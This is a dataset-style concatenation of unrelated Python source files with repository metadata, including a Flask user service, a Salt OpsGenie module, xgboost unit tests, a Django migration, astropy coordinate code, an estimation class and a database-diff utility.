print("\n", "trueskill dictionary updated from last game", "\n")
| 62.12766 | 291 | 0.738356 |
acfb6c07e38ad8fa6aaccccaa3f8fba6e7b62444 | 319 | py | Python | requests_testing.py | ingxfm/python-web-modules-testing | a6eaeb6a6f77924784ba6f74c1e9c3df313d07e4 | [
"MIT"
] | null | null | null | requests_testing.py | ingxfm/python-web-modules-testing | a6eaeb6a6f77924784ba6f74c1e9c3df313d07e4 | [
"MIT"
] | null | null | null | requests_testing.py | ingxfm/python-web-modules-testing | a6eaeb6a6f77924784ba6f74c1e9c3df313d07e4 | [
"MIT"
] | null | null | null | # Python Standard libraries
# 3rd-party libraries
import requests
# Local libraries
res = requests.get('https://automatetheboringstuff.com/files/rj.txt')
#print(type(res))
try:
res.raise_for_status()
except Exception as exc:
print('There was a problem: %s' % (exc))
print(res.text[:262])
| 17.722222 | 70 | 0.677116 |
acfb6c10f8763b2c87ee071985b9858465a1eadb | 814 | py | Python | active_user_service.py | srtsignin/ActiveUserService-Spike | 8f6248d48ea4a71b3c60983e9c72b3feb8d62754 | [
"MIT"
] | null | null | null | active_user_service.py | srtsignin/ActiveUserService-Spike | 8f6248d48ea4a71b3c60983e9c72b3feb8d62754 | [
"MIT"
] | null | null | null | active_user_service.py | srtsignin/ActiveUserService-Spike | 8f6248d48ea4a71b3c60983e9c72b3feb8d62754 | [
"MIT"
] | null | null | null | from flask import Flask
from flask import request
import json
app = Flask(__name__)
active_users = list()
@app.route('/', methods=['GET', 'POST', 'DELETE'])
def handle_request():
global active_users
if request.method == 'GET':
response = {
'activeUsers': active_users
}
return json.dumps(response)
if request.method == 'POST':
user = json.loads(request.data)
active_users.append(user)
response = {
'userAdded': user,
'activeUsers': active_users
}
return json.dumps(response)
active_users.clear()
response = {
'result': 'Success',
'activeUsers': active_users
}
return json.dumps(response)
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0', port=65001) | 24.666667 | 51 | 0.595823 |
acfb6c55207feb3626e3f1317df307629ad0a149 | 787 | py | Python | src/meltano/core/setting.py | siilats/meltano | 404605c83f441c3fc2b729e26416c6caa8b0ed0b | [
"MIT"
] | 122 | 2021-06-21T17:30:29.000Z | 2022-03-25T06:21:38.000Z | src/meltano/core/setting.py | siilats/meltano | 404605c83f441c3fc2b729e26416c6caa8b0ed0b | [
"MIT"
] | null | null | null | src/meltano/core/setting.py | siilats/meltano | 404605c83f441c3fc2b729e26416c6caa8b0ed0b | [
"MIT"
] | 21 | 2021-06-22T10:08:15.000Z | 2022-03-18T08:57:02.000Z | import logging
import os
import sqlalchemy.types as types
from sqlalchemy import Column, UniqueConstraint
from .models import SystemModel
from .utils import nest
class Setting(SystemModel):
__tablename__ = "plugin_settings"
# represent the mapping to the ENV
label = Column(types.String)
description = Column(types.Text)
# represent a materialized path to support
# a nested configuration.
name = Column(types.String, primary_key=True)
namespace = Column(types.String, primary_key=True, nullable=True)
value = Column(types.PickleType)
enabled = Column(types.Boolean, default=False)
def __repr__(self):
enabled_marker = "E" if self.enabled else ""
return f"<({self.namespace}) {self.name}={self.value} {enabled_marker}>"
| 28.107143 | 80 | 0.721728 |
acfb6d2964366ced89e8e844ee4902b958558c91 | 1,448 | py | Python | Secao9_ComprehensionEmPython/ListasAninhadas.py | PauloFTeixeira/curso_python | 9040c7dcc5262620f6330bb9637710bb8899bc6b | [
"MIT"
] | null | null | null | Secao9_ComprehensionEmPython/ListasAninhadas.py | PauloFTeixeira/curso_python | 9040c7dcc5262620f6330bb9637710bb8899bc6b | [
"MIT"
] | null | null | null | Secao9_ComprehensionEmPython/ListasAninhadas.py | PauloFTeixeira/curso_python | 9040c7dcc5262620f6330bb9637710bb8899bc6b | [
"MIT"
] | null | null | null | """
Listas aninhadas - (nested list)
Em algumas linguagens, tem-se arrays (C, Java)
- Unidimensional (arrays/vetores)
- Multidimensionais (matrizes)
Em python, se tem as listas aninhadas
Exemplo:
lista = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
Obs.: Cada sublista é uma linha
Cada numero é uma coluna
Acesso aos dados
print(lista[linha][coluna])
------------------------------------------------------------------------------------------------------------------
# ACESSANDO DADOS
lista = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
print(lista[0][0])
------------------------------------------------------------------------------------------------------------------
# ITERANDO COM LOOP EM LISTA ANINHADA
for list in lista:
for num in list:
print(num)
------------------------------------------------------------------------------------------------------------------
# LIST COMPREHENSION
[[print(valor) for valor in list]for list in lista]
# OBS.: toda instrução comprehension, se lê de trás pra frente
------------------------------------------------------------------------------------------------------------------
"""
# OUTROS EXEMPLOS
# GERANDO UM TABULEIRO/MATRIZ 3X3
tabuleiro = [[numero for numero in range(1, 4)] for valor in range(1, 4)]
print(tabuleiro)
# GERANDO JOGADAS DE JOGO DA VELHA
velha = [['x' if numero % 2 == 0 else '0' for numero in range(1, 4)] for valor in range(1, 4)]
print(velha)
| 22.625 | 114 | 0.446823 |
acfb6d37e5d7640cd27cbcbef5206d7fb74d502f | 3,072 | py | Python | salt/modules/opsgenie.py | yuanbaopapa/salt | c46490c18394799b5ea5d115c4500080cf41ef91 | [
"Apache-2.0"
] | 1 | 2021-08-14T13:48:38.000Z | 2021-08-14T13:48:38.000Z | salt/modules/opsgenie.py | yuanbaopapa/salt | c46490c18394799b5ea5d115c4500080cf41ef91 | [
"Apache-2.0"
] | 3 | 2015-03-31T14:44:05.000Z | 2015-06-18T19:02:24.000Z | salt/modules/opsgenie.py | yuanbaopapa/salt | c46490c18394799b5ea5d115c4500080cf41ef91 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
'''
Module for sending data to OpsGenie
.. versionadded:: Oxygen
:configuration: This module can be used in Reactor System for
posting data to OpsGenie as a remote-execution function.
For example:
.. code-block:: yaml
opsgenie_event_poster:
local.opsgenie.post_data:
- tgt: 'salt-minion'
- kwarg:
name: event.reactor
api_key: XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX
reason: {{ data['data']['reason'] }}
action_type: Create
'''
# Import Python libs
from __future__ import absolute_import
import json
import logging
import requests
# Import Salt libs
import salt.exceptions
API_ENDPOINT = "https://api.opsgenie.com/v1/json/saltstack?apiKey="
log = logging.getLogger(__name__)
def post_data(api_key=None, name='OpsGenie Execution Module', reason=None,
action_type=None):
'''
Post data to OpsGenie. It's designed for Salt's Event Reactor.
After configuring the sls reaction file as shown above, you can trigger the
module with your designated tag (og-tag in this case).
CLI Example:
.. code-block:: bash
salt-call event.send 'og-tag' '{"reason" : "Overheating CPU!"}'
Required parameters:
api_key
It's the API Key you've copied while adding integration in OpsGenie.
reason
It will be used as alert's default message in OpsGenie.
action_type
OpsGenie supports the default values Create/Close for action_type. You
can customize this field with OpsGenie's custom actions for other
purposes like adding notes or acknowledging alerts.
Optional parameters:
name
It will be used as alert's alias. If you want to use the close
functionality you must provide name field for both states like in
this case.
'''
if api_key is None or reason is None or action_type is None:
raise salt.exceptions.SaltInvocationError(
'API Key or Reason or Action Type cannot be None.')
data = dict()
data['name'] = name
data['reason'] = reason
data['actionType'] = action_type
data['cpuModel'] = __grains__['cpu_model']
data['cpuArch'] = __grains__['cpuarch']
data['fqdn'] = __grains__['fqdn']
data['host'] = __grains__['host']
data['id'] = __grains__['id']
data['kernel'] = __grains__['kernel']
data['kernelRelease'] = __grains__['kernelrelease']
data['master'] = __grains__['master']
data['os'] = __grains__['os']
data['saltPath'] = __grains__['saltpath']
data['saltVersion'] = __grains__['saltversion']
data['username'] = __grains__['username']
data['uuid'] = __grains__['uuid']
log.debug('Below data will be posted:\n' + str(data))
log.debug('API Key:' + api_key + '\t API Endpoint:' + API_ENDPOINT)
response = requests.post(url=API_ENDPOINT + api_key, data=json.dumps(data),
headers={'Content-Type': 'application/json'})
return response.status_code, response.text
| 31.030303 | 79 | 0.651693 |
acfb6db560befd2a280702d409f8b889bcdc981a | 12,263 | py | Python | tests/python/test_basic.py | sanchitanand/xgboost | b3193052b31e3e984f0f3d9c2c67ae3c2e114f9b | [
"Apache-2.0"
] | 2 | 2021-03-07T15:27:46.000Z | 2021-03-07T15:32:28.000Z | tests/python/test_basic.py | sanchitanand/xgboost | b3193052b31e3e984f0f3d9c2c67ae3c2e114f9b | [
"Apache-2.0"
] | 1 | 2020-07-20T17:18:36.000Z | 2020-07-20T17:18:36.000Z | tests/python/test_basic.py | sanchitanand/xgboost | b3193052b31e3e984f0f3d9c2c67ae3c2e114f9b | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import sys
from contextlib import contextmanager
from io import StringIO
import numpy as np
import os
import xgboost as xgb
import unittest
import json
from pathlib import Path
import tempfile
dpath = 'demo/data/'
rng = np.random.RandomState(1994)
@contextmanager
def captured_output():
"""Reassign stdout temporarily in order to test printed statements
Taken from:
https://stackoverflow.com/questions/4219717/how-to-assert-output-with-nosetest-unittest-in-python
Also works for pytest.
"""
new_out, new_err = StringIO(), StringIO()
old_out, old_err = sys.stdout, sys.stderr
try:
sys.stdout, sys.stderr = new_out, new_err
yield sys.stdout, sys.stderr
finally:
sys.stdout, sys.stderr = old_out, old_err
class TestBasic(unittest.TestCase):
def test_compat(self):
from xgboost.compat import lazy_isinstance
a = np.array([1, 2, 3])
assert lazy_isinstance(a, 'numpy', 'ndarray')
assert not lazy_isinstance(a, 'numpy', 'dataframe')
def test_basic(self):
dtrain = xgb.DMatrix(dpath + 'agaricus.txt.train')
dtest = xgb.DMatrix(dpath + 'agaricus.txt.test')
param = {'max_depth': 2, 'eta': 1,
'objective': 'binary:logistic'}
# specify validations set to watch performance
watchlist = [(dtrain, 'train')]
num_round = 2
bst = xgb.train(param, dtrain, num_round, watchlist, verbose_eval=True)
preds = bst.predict(dtrain)
labels = dtrain.get_label()
err = sum(1 for i in range(len(preds))
if int(preds[i] > 0.5) != labels[i]) / float(len(preds))
# error must be smaller than 10%
assert err < 0.1
preds = bst.predict(dtest)
labels = dtest.get_label()
err = sum(1 for i in range(len(preds))
if int(preds[i] > 0.5) != labels[i]) / float(len(preds))
# error must be smaller than 10%
assert err < 0.1
with tempfile.TemporaryDirectory() as tmpdir:
dtest_path = os.path.join(tmpdir, 'dtest.dmatrix')
# save dmatrix into binary buffer
dtest.save_binary(dtest_path)
# save model
model_path = os.path.join(tmpdir, 'model.booster')
bst.save_model(model_path)
# load model and data in
bst2 = xgb.Booster(model_file=model_path)
dtest2 = xgb.DMatrix(dtest_path)
preds2 = bst2.predict(dtest2)
# assert they are the same
assert np.sum(np.abs(preds2 - preds)) == 0
def test_record_results(self):
dtrain = xgb.DMatrix(dpath + 'agaricus.txt.train')
dtest = xgb.DMatrix(dpath + 'agaricus.txt.test')
param = {'max_depth': 2, 'eta': 1, 'verbosity': 0,
'objective': 'binary:logistic'}
# specify validations set to watch performance
watchlist = [(dtest, 'eval'), (dtrain, 'train')]
num_round = 2
result = {}
res2 = {}
xgb.train(param, dtrain, num_round, watchlist,
callbacks=[xgb.callback.record_evaluation(result)])
xgb.train(param, dtrain, num_round, watchlist,
evals_result=res2)
assert result['train']['error'][0] < 0.1
assert res2 == result
def test_multiclass(self):
dtrain = xgb.DMatrix(dpath + 'agaricus.txt.train')
dtest = xgb.DMatrix(dpath + 'agaricus.txt.test')
param = {'max_depth': 2, 'eta': 1, 'verbosity': 0, 'num_class': 2}
# specify validations set to watch performance
watchlist = [(dtest, 'eval'), (dtrain, 'train')]
num_round = 2
bst = xgb.train(param, dtrain, num_round, watchlist)
# this is prediction
preds = bst.predict(dtest)
labels = dtest.get_label()
err = sum(1 for i in range(len(preds))
if preds[i] != labels[i]) / float(len(preds))
# error must be smaller than 10%
assert err < 0.1
with tempfile.TemporaryDirectory() as tmpdir:
dtest_path = os.path.join(tmpdir, 'dtest.buffer')
model_path = os.path.join(tmpdir, 'xgb.model')
# save dmatrix into binary buffer
dtest.save_binary(dtest_path)
# save model
bst.save_model(model_path)
# load model and data in
bst2 = xgb.Booster(model_file=model_path)
dtest2 = xgb.DMatrix(dtest_path)
preds2 = bst2.predict(dtest2)
# assert they are the same
assert np.sum(np.abs(preds2 - preds)) == 0
def test_dump(self):
data = np.random.randn(100, 2)
target = np.array([0, 1] * 50)
features = ['Feature1', 'Feature2']
dm = xgb.DMatrix(data, label=target, feature_names=features)
params = {'objective': 'binary:logistic',
'eval_metric': 'logloss',
'eta': 0.3,
'max_depth': 1}
bst = xgb.train(params, dm, num_boost_round=1)
# number of feature importances should == number of features
dump1 = bst.get_dump()
self.assertEqual(len(dump1), 1, "Expected only 1 tree to be dumped.")
self.assertEqual(len(dump1[0].splitlines()), 3,
"Expected 1 root and 2 leaves - 3 lines in dump.")
dump2 = bst.get_dump(with_stats=True)
self.assertEqual(dump2[0].count('\n'), 3,
"Expected 1 root and 2 leaves - 3 lines in dump.")
self.assertGreater(dump2[0].find('\n'), dump1[0].find('\n'),
"Expected more info when with_stats=True is given.")
dump3 = bst.get_dump(dump_format="json")
dump3j = json.loads(dump3[0])
self.assertEqual(dump3j["nodeid"], 0, "Expected the root node on top.")
dump4 = bst.get_dump(dump_format="json", with_stats=True)
dump4j = json.loads(dump4[0])
self.assertIn("gain", dump4j, "Expected 'gain' to be dumped in JSON.")
def test_load_file_invalid(self):
self.assertRaises(xgb.core.XGBoostError, xgb.Booster,
model_file='incorrect_path')
self.assertRaises(xgb.core.XGBoostError, xgb.Booster,
model_file=u'不正なパス')
def test_dmatrix_numpy_init_omp(self):
rows = [1000, 11326, 15000]
cols = 50
for row in rows:
X = np.random.randn(row, cols)
y = np.random.randn(row).astype('f')
dm = xgb.DMatrix(X, y, nthread=0)
np.testing.assert_array_equal(dm.get_label(), y)
assert dm.num_row() == row
assert dm.num_col() == cols
dm = xgb.DMatrix(X, y, nthread=10)
np.testing.assert_array_equal(dm.get_label(), y)
assert dm.num_row() == row
assert dm.num_col() == cols
def test_cv(self):
dm = xgb.DMatrix(dpath + 'agaricus.txt.train')
params = {'max_depth': 2, 'eta': 1, 'verbosity': 0,
'objective': 'binary:logistic'}
# return np.ndarray
cv = xgb.cv(params, dm, num_boost_round=10, nfold=10, as_pandas=False)
assert isinstance(cv, dict)
assert len(cv) == (4)
def test_cv_no_shuffle(self):
dm = xgb.DMatrix(dpath + 'agaricus.txt.train')
params = {'max_depth': 2, 'eta': 1, 'verbosity': 0,
'objective': 'binary:logistic'}
# return np.ndarray
cv = xgb.cv(params, dm, num_boost_round=10, shuffle=False, nfold=10,
as_pandas=False)
assert isinstance(cv, dict)
assert len(cv) == (4)
def test_cv_explicit_fold_indices(self):
dm = xgb.DMatrix(dpath + 'agaricus.txt.train')
params = {'max_depth': 2, 'eta': 1, 'verbosity': 0, 'objective':
'binary:logistic'}
folds = [
# Train Test
([1, 3], [5, 8]),
([7, 9], [23, 43]),
]
# return np.ndarray
cv = xgb.cv(params, dm, num_boost_round=10, folds=folds,
as_pandas=False)
assert isinstance(cv, dict)
assert len(cv) == (4)
def test_cv_explicit_fold_indices_labels(self):
params = {'max_depth': 2, 'eta': 1, 'verbosity': 0, 'objective':
'reg:squarederror'}
N = 100
F = 3
dm = xgb.DMatrix(data=np.random.randn(N, F), label=np.arange(N))
folds = [
# Train Test
([1, 3], [5, 8]),
([7, 9], [23, 43, 11]),
]
# Use callback to log the test labels in each fold
def cb(cbackenv):
print([fold.dtest.get_label() for fold in cbackenv.cvfolds])
# Run cross validation and capture standard out to test callback result
with captured_output() as (out, err):
xgb.cv(
params, dm, num_boost_round=1, folds=folds, callbacks=[cb],
as_pandas=False
)
output = out.getvalue().strip()
solution = ('[array([5., 8.], dtype=float32), array([23., 43., 11.],' +
' dtype=float32)]')
assert output == solution
class TestBasicPathLike(unittest.TestCase):
"""Unit tests using the os_fspath and pathlib.Path for file interaction."""
def test_DMatrix_init_from_path(self):
"""Initialization from the data path."""
dpath = Path('demo/data')
dtrain = xgb.DMatrix(dpath / 'agaricus.txt.train')
assert dtrain.num_row() == 6513
assert dtrain.num_col() == 127
def test_DMatrix_save_to_path(self):
"""Saving to a binary file using pathlib from a DMatrix."""
data = np.random.randn(100, 2)
target = np.array([0, 1] * 50)
features = ['Feature1', 'Feature2']
dm = xgb.DMatrix(data, label=target, feature_names=features)
# save, assert exists, remove file
binary_path = Path("dtrain.bin")
dm.save_binary(binary_path)
assert binary_path.exists()
Path.unlink(binary_path)
def test_Booster_init_invalid_path(self):
"""An invalid model_file path should raise XGBoostError."""
self.assertRaises(xgb.core.XGBoostError, xgb.Booster,
model_file=Path("invalidpath"))
def test_Booster_save_and_load(self):
"""Saving and loading model files from paths."""
save_path = Path("saveload.model")
data = np.random.randn(100, 2)
target = np.array([0, 1] * 50)
features = ['Feature1', 'Feature2']
dm = xgb.DMatrix(data, label=target, feature_names=features)
params = {'objective': 'binary:logistic',
'eval_metric': 'logloss',
'eta': 0.3,
'max_depth': 1}
bst = xgb.train(params, dm, num_boost_round=1)
# save, assert exists
bst.save_model(save_path)
assert save_path.exists()
def dump_assertions(dump):
"""Assertions for the expected dump from Booster"""
assert len(dump) == 1, 'Exepcted only 1 tree to be dumped.'
assert len(dump[0].splitlines()) == 3, 'Expected 1 root and 2 leaves - 3 lines.'
# load the model again using Path
bst2 = xgb.Booster(model_file=save_path)
dump2 = bst2.get_dump()
dump_assertions(dump2)
# load again using load_model
bst3 = xgb.Booster()
bst3.load_model(save_path)
dump3= bst3.get_dump()
dump_assertions(dump3)
# remove file
Path.unlink(save_path)
def test_os_fspath(self):
"""Core properties of the os_fspath function."""
# strings are returned unmodified
assert '' == xgb.compat.os_fspath('')
assert '/this/path' == xgb.compat.os_fspath('/this/path')
# bytes are returned unmodified
assert b'/this/path' == xgb.compat.os_fspath(b'/this/path')
# path objects are returned as string representation
path_test = Path('this') / 'path'
assert str(path_test) == xgb.compat.os_fspath(path_test)
# invalid values raise Type error
self.assertRaises(TypeError, xgb.compat.os_fspath, 123)
| 36.497024 | 101 | 0.577346 |
acfb6e045addb33ebadcc4064c8f36a0f4f33f3b | 4,843 | py | Python | users/migrations/0001_initial.py | almazkun/TWS | c4c52e9f96a0638e395e39a17186e43cfefd5093 | [
"MIT"
] | 1 | 2020-06-12T05:50:59.000Z | 2020-06-12T05:50:59.000Z | users/migrations/0001_initial.py | almazkun/TWS | c4c52e9f96a0638e395e39a17186e43cfefd5093 | [
"MIT"
] | 6 | 2020-06-09T09:54:16.000Z | 2021-09-22T19:16:11.000Z | users/migrations/0001_initial.py | almazkun/TWS | c4c52e9f96a0638e395e39a17186e43cfefd5093 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.4 on 2020-06-09 02:25
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [("auth", "0011_update_proxy_permissions")]
operations = [
migrations.CreateModel(
name="CustomUser",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("password", models.CharField(max_length=128, verbose_name="password")),
(
"last_login",
models.DateTimeField(
blank=True, null=True, verbose_name="last login"
),
),
(
"is_superuser",
models.BooleanField(
default=False,
help_text="Designates that this user has all permissions without explicitly assigning them.",
verbose_name="superuser status",
),
),
(
"username",
models.CharField(
error_messages={
"unique": "A user with that username already exists."
},
help_text="Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.",
max_length=150,
unique=True,
validators=[
django.contrib.auth.validators.UnicodeUsernameValidator()
],
verbose_name="username",
),
),
(
"first_name",
models.CharField(
blank=True, max_length=30, verbose_name="first name"
),
),
(
"last_name",
models.CharField(
blank=True, max_length=150, verbose_name="last name"
),
),
(
"email",
models.EmailField(
blank=True, max_length=254, verbose_name="email address"
),
),
(
"is_staff",
models.BooleanField(
default=False,
help_text="Designates whether the user can log into this admin site.",
verbose_name="staff status",
),
),
(
"is_active",
models.BooleanField(
default=True,
help_text="Designates whether this user should be treated as active. Unselect this instead of deleting accounts.",
verbose_name="active",
),
),
(
"date_joined",
models.DateTimeField(
default=django.utils.timezone.now, verbose_name="date joined"
),
),
("name", models.CharField(blank=True, max_length=255)),
(
"groups",
models.ManyToManyField(
blank=True,
help_text="The groups this user belongs to. A user will get all permissions granted to each of their groups.",
related_name="user_set",
related_query_name="user",
to="auth.Group",
verbose_name="groups",
),
),
(
"user_permissions",
models.ManyToManyField(
blank=True,
help_text="Specific permissions for this user.",
related_name="user_set",
related_query_name="user",
to="auth.Permission",
verbose_name="user permissions",
),
),
],
options={
"verbose_name": "user",
"verbose_name_plural": "users",
"abstract": False,
},
managers=[("objects", django.contrib.auth.models.UserManager())],
)
]
| 37.253846 | 138 | 0.400991 |
acfb6f35e3a1ba65761121fd690e7e2767f862d9 | 101 | py | Python | Aula 07/Ex4.py | diegorafaelvieira/Programacao-1 | 657a974f1215cec4aed68603e738d9a135131545 | [
"MIT"
] | null | null | null | Aula 07/Ex4.py | diegorafaelvieira/Programacao-1 | 657a974f1215cec4aed68603e738d9a135131545 | [
"MIT"
] | null | null | null | Aula 07/Ex4.py | diegorafaelvieira/Programacao-1 | 657a974f1215cec4aed68603e738d9a135131545 | [
"MIT"
] | null | null | null | produto = 1
for i in range (1,16):
if i%2!=0:
produto = produto*i
print(produto)
| 16.833333 | 27 | 0.534653 |
acfb6f4c22a2b205e26993f1482180711acd9b81 | 4,059 | py | Python | astropy/coordinates/builtin_frames/galactic.py | Olek-Donaldson/astropy | ed9ec69007bd540bcf476def57c5231e5e7c1240 | [
"BSD-3-Clause"
] | 4 | 2021-03-25T15:49:56.000Z | 2021-12-15T09:10:04.000Z | astropy/coordinates/builtin_frames/galactic.py | Olek-Donaldson/astropy | ed9ec69007bd540bcf476def57c5231e5e7c1240 | [
"BSD-3-Clause"
] | 20 | 2021-05-03T18:02:23.000Z | 2022-03-12T12:01:04.000Z | astropy/coordinates/builtin_frames/galactic.py | Olek-Donaldson/astropy | ed9ec69007bd540bcf476def57c5231e5e7c1240 | [
"BSD-3-Clause"
] | 3 | 2021-03-28T16:13:00.000Z | 2021-07-16T10:27:25.000Z | # -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from astropy import units as u
from astropy.utils.decorators import format_doc
from astropy.coordinates.angles import Angle
from astropy.coordinates import representation as r
from astropy.coordinates.baseframe import BaseCoordinateFrame, RepresentationMapping, base_doc
# these are needed for defining the NGP
from .fk5 import FK5
from .fk4 import FK4NoETerms
__all__ = ['Galactic']
doc_components = """
l : `~astropy.coordinates.Angle`, optional, must be keyword
The Galactic longitude for this object (``b`` must also be given and
``representation`` must be None).
b : `~astropy.coordinates.Angle`, optional, must be keyword
The Galactic latitude for this object (``l`` must also be given and
``representation`` must be None).
distance : `~astropy.units.Quantity`, optional, must be keyword
The Distance for this object along the line-of-sight.
pm_l_cosb : :class:`~astropy.units.Quantity`, optional, must be keyword
The proper motion in Galactic longitude (including the ``cos(b)`` term)
for this object (``pm_b`` must also be given).
pm_b : :class:`~astropy.units.Quantity`, optional, must be keyword
The proper motion in Galactic latitude for this object (``pm_l_cosb``
must also be given).
radial_velocity : :class:`~astropy.units.Quantity`, optional, must be keyword
The radial velocity of this object.
"""
doc_footer = """
Notes
-----
.. [1] Blaauw, A.; Gum, C. S.; Pawsey, J. L.; Westerhout, G. (1960), "The
new I.A.U. system of galactic coordinates (1958 revision),"
`MNRAS, Vol 121, pp.123 <https://ui.adsabs.harvard.edu/abs/1960MNRAS.121..123B>`_.
"""
@format_doc(base_doc, components=doc_components, footer=doc_footer)
class Galactic(BaseCoordinateFrame):
"""
A coordinate or frame in the Galactic coordinate system.
This frame is used in a variety of Galactic contexts because it has as its
x-y plane the plane of the Milky Way. The positive x direction (i.e., the
l=0, b=0 direction) points to the center of the Milky Way and the z-axis
points toward the North Galactic Pole (following the IAU's 1958 definition
[1]_). However, unlike the `~astropy.coordinates.Galactocentric` frame, the
*origin* of this frame in 3D space is the solar system barycenter, not
the center of the Milky Way.
"""
frame_specific_representation_info = {
r.SphericalRepresentation: [
RepresentationMapping('lon', 'l'),
RepresentationMapping('lat', 'b')
],
r.CartesianRepresentation: [
RepresentationMapping('x', 'u'),
RepresentationMapping('y', 'v'),
RepresentationMapping('z', 'w')
],
r.CartesianDifferential: [
RepresentationMapping('d_x', 'U', u.km/u.s),
RepresentationMapping('d_y', 'V', u.km/u.s),
RepresentationMapping('d_z', 'W', u.km/u.s)
]
}
default_representation = r.SphericalRepresentation
default_differential = r.SphericalCosLatDifferential
# North galactic pole and zeropoint of l in FK4/FK5 coordinates. Needed for
# transformations to/from FK4/5
# These are from the IAU's definition of galactic coordinates
_ngp_B1950 = FK4NoETerms(ra=192.25*u.degree, dec=27.4*u.degree)
_lon0_B1950 = Angle(123, u.degree)
# These are *not* from Reid & Brunthaler 2004 - instead, they were
# derived by doing:
#
# >>> FK4NoETerms(ra=192.25*u.degree, dec=27.4*u.degree).transform_to(FK5())
#
# This gives better consistency with other codes than using the values
# from Reid & Brunthaler 2004 and the best self-consistency between FK5
# -> Galactic and FK5 -> FK4 -> Galactic. The lon0 angle was found by
# optimizing the self-consistency.
_ngp_J2000 = FK5(ra=192.8594812065348*u.degree, dec=27.12825118085622*u.degree)
_lon0_J2000 = Angle(122.9319185680026, u.degree)
| 41.418367 | 94 | 0.68071 |
acfb706e6f53ca1796ce2c207354028a9d427f9c | 2,839 | py | Python | max_likelihood.py | SnetkovR/mmpe | 3aabd85dc487b4d9a3ba69d1cfbdfe107e318a91 | [
"Apache-2.0"
] | null | null | null | max_likelihood.py | SnetkovR/mmpe | 3aabd85dc487b4d9a3ba69d1cfbdfe107e318a91 | [
"Apache-2.0"
] | null | null | null | max_likelihood.py | SnetkovR/mmpe | 3aabd85dc487b4d9a3ba69d1cfbdfe107e318a91 | [
"Apache-2.0"
] | null | null | null | import numpy as np
import copy
from scipy.integrate import odeint
from collections import namedtuple
class MaxLikelihood:
def __init__(self, Q, R, H,
x_0, P, t,
F, Gamma, nu,
u, N, phi, update_dict):
self._Q = Q
self._R = R
self.x_0 = x_0
self._P = P
self.t = t
self._F = F
self._H = H
self.N = N
self.nu = nu
self.Gamma = Gamma
self.u = u
self.phi = phi
self.update_dict = update_dict
@property
def x0(self):
return self.x_0
@property
def p0(self):
return self._P
@property
def R(self):
return self._R
@property
def Q(self):
return self._Q
@property
def H(self):
return self._H
@property
def y(self):
return self._y
@y.setter
def y(self, _y):
if _y:
self._y = copy.copy(_y)
@property
def F(self):
return self._F
@F.setter
def F(self, _F):
if _F:
self._F = copy.copy(_F)
def update(self, params):
for var in self.update_dict:
if self.__dict__.get(var) is not None:
self.__dict__[var] = self.update_dict[var](params)
def dxdt(self, x, t, u):
return self._F @ x + np.array([u]) @ self.phi
def calc_P(self, P, t):
p = np.diagflat(P)
return np.diag(self._F @ p + p @ self._F.T + self.Gamma @ self.Q @ self.Gamma.T)
def eq_for_p(self, time_step, x0):
t = np.linspace(time_step.start, time_step.end, 10)
x = odeint(self.calc_P, np.diag(x0), t)
return np.diagflat([x[:, i][-1] for i in range(len(x0))])
def eq_for_x(self, time_step, x, u, estimated_values):
t_tk = np.linspace(time_step.start, time_step.end, 31)
x0 = x
x = odeint(self.dxdt, x0, t_tk, args=(u,))
return [x[:, i][-1] for i in range(len(x0))]
def estimate(self, params):
if self.dxdt is None:
raise Exception("Before start estimate, please init methods.")
self.update(params)
x_tk = self.x_0
p_tk = self._P
TimeStep = namedtuple('TimeStep', ['start', 'end'])
result = self.N / 2 * np.log(2 * np.pi)
for i in range(self.N):
step = TimeStep(self.t[i], self.t[i + 1])
x = self.eq_for_x(step, x_tk, self.u[i], params)
p = self.eq_for_p(step, p_tk)
e_tk = self._y[i] - self.H @ x
B = self.H @ p @ self.H + self.R
K = p @ self.H / B
x_tk = x + K @ e_tk
p_tk = (np.eye(self._F.shape[0]) - K @ self.H) * p
result += e_tk @ (1 / B) @ e_tk.T + 0.5 * self.nu * np.log(np.linalg.det(B))
result /= 2
return result
| 25.576577 | 88 | 0.512504 |
acfb70de1b2b25998c73f9f7ede1661ceea63f2f | 27,009 | py | Python | src/dbdiff/main.py | andyreagan/dbdiff | 6fccc6cd7c88e1e91def7bfc89057b0c0fd73883 | [
"MIT"
] | null | null | null | src/dbdiff/main.py | andyreagan/dbdiff | 6fccc6cd7c88e1e91def7bfc89057b0c0fd73883 | [
"MIT"
] | null | null | null | src/dbdiff/main.py | andyreagan/dbdiff | 6fccc6cd7c88e1e91def7bfc89057b0c0fd73883 | [
"MIT"
] | null | null | null | import logging
import logging.config
from pathlib import Path
from typing import Any, Dict, Tuple
import pandas as pd
from jinja2 import Environment, PackageLoader
from vertica_python.vertica.cursor import Cursor
from dbdiff.vertica import get_column_info_lookup, implicit_dtype_comparison
JINJA_ENV = Environment(loader=PackageLoader('dbdiff', 'templates'))
LOGGER = logging.getLogger(__name__)
def is_numeric_like(dtype: str):
dtype_l = dtype.lower()
return any({'int' in dtype_l, 'float' in dtype_l, 'numeric' in dtype_l})
def is_date_like(dtype: str):
dtype_l = dtype.lower()
return ('date' in dtype_l)
def check_primary_key(cur: Cursor,
schema: str, table: str,
join_cols: list) -> int:
'''Given a list of columns return the # of records for which they are NOT
a primary key.'''
cur.execute(JINJA_ENV.get_template('table_rows.sql').render(schema_name=schema, table_name=table))
r = cur.fetchall()
n_rows = r[0]['COUNT']
cur.execute(JINJA_ENV.get_template('table_rows_uniq.sql').render(schema_name=schema, table_name=table, join_cols=', '.join(join_cols)))
n_distinct_rows = cur.fetchall()[0]['COUNT']
return n_rows - n_distinct_rows
def get_all_col_info(cur: Cursor, schema, x_table, y_schema, y_table, exclude_columns_set, save_column_summary, save_column_summary_format) -> pd.DataFrame:
LOGGER.info('Getting column info for both tables.')
x_table_info_lookup = get_column_info_lookup(cur, schema, x_table)
